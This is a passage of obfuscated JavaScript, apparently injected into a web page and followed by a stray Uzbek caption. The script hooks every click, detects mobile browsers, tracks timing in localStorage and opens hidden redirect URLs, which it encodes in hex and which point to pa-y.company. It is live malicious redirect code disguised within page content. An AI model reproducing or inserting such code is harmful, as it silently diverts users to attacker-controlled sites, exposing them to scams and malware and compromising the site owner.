_0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid